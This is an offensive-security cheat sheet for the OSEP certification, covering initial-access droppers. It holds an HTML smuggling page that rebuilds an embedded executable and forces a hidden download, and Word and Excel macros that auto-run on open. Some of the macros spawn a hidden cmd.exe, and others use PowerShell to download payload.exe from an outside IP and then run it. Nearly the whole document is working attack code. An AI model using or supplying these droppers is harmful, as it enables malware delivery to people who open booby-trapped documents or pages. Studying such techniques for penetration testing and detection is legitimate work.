

Cheatsheet-OSEP

Droppers

HTML

This saves the executable to the Downloads folder (if the user allows it).

Encode your payload with `base64 payload.exe -w 0 | kitty +kitten clipboard` and replace the `file` value with the output.

Adapt fileName if needed.

Works as expected in:

  • Chrome
  • Edge
  • Internet Explorer
<html>

<body>
	<script>
		function base64ToArrayBuffer(base64) {
			// Decode a base64 string into the bytes it encodes and return the
			// backing ArrayBuffer. window.atob yields a "binary string" with one
			// character per byte; each char code is copied into a Uint8Array.
			var decoded = window.atob(base64);
			var bytes = new Uint8Array(decoded.length);
			var idx = decoded.length;
			while (idx--) {
				bytes[idx] = decoded.charCodeAt(idx);
			}
			return bytes.buffer;
		}
		/* base64 demon.x64.exe -w 0 | kitty +kitten clipboard */
		// File name the browser offers in the save dialog / writes to Downloads.
		var fileName = 'msfstaged.exe';
		console.log('START');
		// The executable itself, base64-encoded and inlined in the page (truncated here).
		// The bytes are reconstructed client-side, so what crosses the network is an HTML
		// page rather than a separate .exe transfer — relevant to anyone inspecting traffic.
		var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAA...';
		var data = base64ToArrayBuffer(file);
		// NOTE(review): 'octet/stream' is not a registered MIME type (application/octet-stream
		// is); the compatibility list above suggests the listed browsers accept it regardless.
		var blob = new Blob([data], { type: 'octet/stream' });

		console.log('Before Elem');

		// msSaveBlob exists only on IE / legacy (EdgeHTML) Edge and saves the blob directly.
		if (window.navigator.msSaveBlob) {
			// IE/Edge
			console.log('Edge/Internet Explorer');
			window.navigator.msSaveBlob(blob, fileName);
		}
		else {
			// Everywhere else: a hidden anchor pointing at a blob: URL with the download
			// attribute set, clicked programmatically; the object URL is revoked after the click.
			// The anchor is left attached to the body.
			console.log('Chrome/Firefox or others');
			var a = document.createElement('a');
			document.body.appendChild(a);
			a.style = 'display: none'; // assigning a string to .style sets its cssText
			var url = window.URL.createObjectURL(blob);
			a.href = url;
			a.download = fileName;
			a.click();
			window.URL.revokeObjectURL(url);
		}
		console.log('END');
	</script>
</body>

</html>

Office

Word

Basic example

.docx files cannot contain macros; save the document as .doc or .docm instead.

Shell method:

' Auto-run entry point: Word raises Document_Open when the document is opened
' with macros enabled. It only delegates to MyMacro.
Sub Document_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (AutoOpen), kept alongside Document_Open so
' MyMacro runs whichever of the two events the host fires.
Sub AutoOpen()
    MyMacro
End Sub

' Starts cmd.exe in a hidden window via VBA's Shell. From a detection standpoint
' the observable behaviour is an Office host process spawning a command shell.
Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide   ' vbHide: no visible window
End Sub

Example file

Windows Script Host method:

' Auto-run entry point: Word raises Document_Open when the document is opened
' with macros enabled. It only delegates to MyMacro.
Sub Document_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (AutoOpen), kept alongside Document_Open so
' MyMacro runs whichever of the two events the host fires.
Sub AutoOpen()
    MyMacro
End Sub

' Starts cmd.exe hidden through the WScript.Shell COM object instead of Shell();
' the trailing 0 is WshShell.Run's window style (hidden). From a detection
' standpoint the observable behaviour is still an Office host spawning a shell.
Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub

Example file

Full dropper and execution

Shell method:

' Auto-run entry point: Word raises Document_Open when the document is opened
' with macros enabled. It only delegates to MyMacro.
Sub Document_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (AutoOpen), kept alongside Document_Open so
' MyMacro runs whichever of the two events the host fires.
Sub AutoOpen()
    MyMacro
End Sub

' Two-stage macro: a hidden PowerShell WebClient.DownloadFile fetches payload.exe
' over plain HTTP, then the file is started after a fixed delay. Observable
' behaviour: Office spawning powershell.exe, an outbound HTTP request, and a new
' executable written to disk and launched from the document's folder.
Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
    Shell str, vbHide   ' stage 1; Shell returns immediately without waiting for the download
    Dim exePath As String
    ' NOTE(review): the download target is the relative 'payload.exe' (resolved against
    ' the spawned process's working directory) while exePath is built from
    ' ActiveDocument.Path; the two only coincide when both refer to the same folder.
    exePath = ActiveDocument.Path + "\payload.exe"
    Sleep (6)   ' fixed 6 s wait (module-level Sleep below) so the download can finish
    Shell exePath, vbHide   ' stage 2: run the downloaded file hidden

End Sub

' Waits n seconds without freezing the host: spins on DoEvents (keeps the UI
' message loop alive) until Now has passed the start time plus n seconds.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Windows Script Host method:

' Auto-run entry point: Word raises Document_Open when the document is opened
' with macros enabled. It only delegates to MyMacro.
Sub Document_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (AutoOpen), kept alongside Document_Open so
' MyMacro runs whichever of the two events the host fires.
Sub AutoOpen()
    MyMacro
End Sub

' Two-stage macro using WScript.Shell instead of Shell(): a hidden PowerShell
' WebClient.DownloadFile fetches payload.exe over plain HTTP, then the file is
' started after a fixed delay. Observable behaviour: Office spawning
' powershell.exe, an outbound HTTP request, and a new executable on disk.
Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
    CreateObject("Wscript.Shell").Run str, 0   ' stage 1; window style 0 = hidden, Run does not wait by default
    Dim exePath As String
    ' NOTE(review): the download target is the relative 'payload.exe' (resolved against
    ' the spawned process's working directory) while exePath is built from
    ' ActiveDocument.Path; the two only coincide when both refer to the same folder.
    exePath = ActiveDocument.Path + "\payload.exe"
    Sleep (6)   ' fixed 6 s wait (module-level Sleep below) so the download can finish
    CreateObject("Wscript.Shell").Run exePath, 0   ' stage 2: run the downloaded file hidden

End Sub

' Waits n seconds without freezing the host: spins on DoEvents (keeps the UI
' message loop alive) until Now has passed the start time plus n seconds.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Excel

Basic example

Shell method:

' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. It only delegates to MyMacro.
Sub Workbook_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (Auto_Open), kept alongside Workbook_Open so
' MyMacro runs whichever of the two events the host fires.
Sub Auto_Open()
    MyMacro
End Sub

' Starts cmd.exe in a hidden window via VBA's Shell. From a detection standpoint
' the observable behaviour is an Office host process spawning a command shell.
Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide   ' vbHide: no visible window
End Sub

Example file

Windows Script Host method:

' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. It only delegates to MyMacro.
Sub Workbook_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (Auto_Open), kept alongside Workbook_Open so
' MyMacro runs whichever of the two events the host fires.
Sub Auto_Open()
    MyMacro
End Sub

' Starts cmd.exe hidden through the WScript.Shell COM object instead of Shell();
' the trailing 0 is WshShell.Run's window style (hidden). From a detection
' standpoint the observable behaviour is still an Office host spawning a shell.
Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub

Example file

Full dropper and execution

Shell method:

' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. It only delegates to MyMacro.
Sub Workbook_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (Auto_Open), kept alongside Workbook_Open so
' MyMacro runs whichever of the two events the host fires.
Sub Auto_Open()
    MyMacro
End Sub

' Two-stage macro: a hidden PowerShell WebClient.DownloadFile fetches payload.exe
' over plain HTTP to a fixed path under C:\Windows\Temp, then the file is started
' after a fixed delay. Observable behaviour: Office spawning powershell.exe, an
' outbound HTTP request, and a new executable written to and launched from
' C:\Windows\Temp. Unlike the Word variant, download and execution paths agree.
Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
    Shell str, vbHide   ' stage 1; Shell returns immediately without waiting for the download
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"   ' presumes the current user can write here — confirm
    Sleep (6)   ' fixed 6 s wait (module-level Sleep below) so the download can finish
    Shell exePath, vbHide   ' stage 2: run the downloaded file hidden

End Sub

' Waits n seconds without freezing the host: spins on DoEvents (keeps the UI
' message loop alive) until Now has passed the start time plus n seconds.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

Windows Script Host method:

' Auto-run entry point: Excel raises Workbook_Open when the workbook is opened
' with macros enabled. It only delegates to MyMacro.
Sub Workbook_Open()
    MyMacro
End Sub

' Legacy auto-run entry point (Auto_Open), kept alongside Workbook_Open so
' MyMacro runs whichever of the two events the host fires.
Sub Auto_Open()
    MyMacro
End Sub

' Two-stage macro using WScript.Shell instead of Shell(): a hidden PowerShell
' WebClient.DownloadFile fetches payload.exe over plain HTTP to a fixed path under
' C:\Windows\Temp, then the file is started after a fixed delay. Observable
' behaviour: Office spawning powershell.exe, an outbound HTTP request, and a new
' executable written to and launched from C:\Windows\Temp.
Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
    CreateObject("Wscript.Shell").Run str, 0   ' stage 1; window style 0 = hidden, Run does not wait by default
    Dim exePath As String
    exePath = "C:\Windows\Temp\payload.exe"   ' presumes the current user can write here — confirm
    Sleep (6)   ' fixed 6 s wait (module-level Sleep below) so the download can finish
    CreateObject("Wscript.Shell").Run exePath, 0   ' stage 2: run the downloaded file hidden

End Sub

' Waits n seconds without freezing the host: spins on DoEvents (keeps the UI
' message loop alive) until Now has passed the start time plus n seconds.
Sub Sleep(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub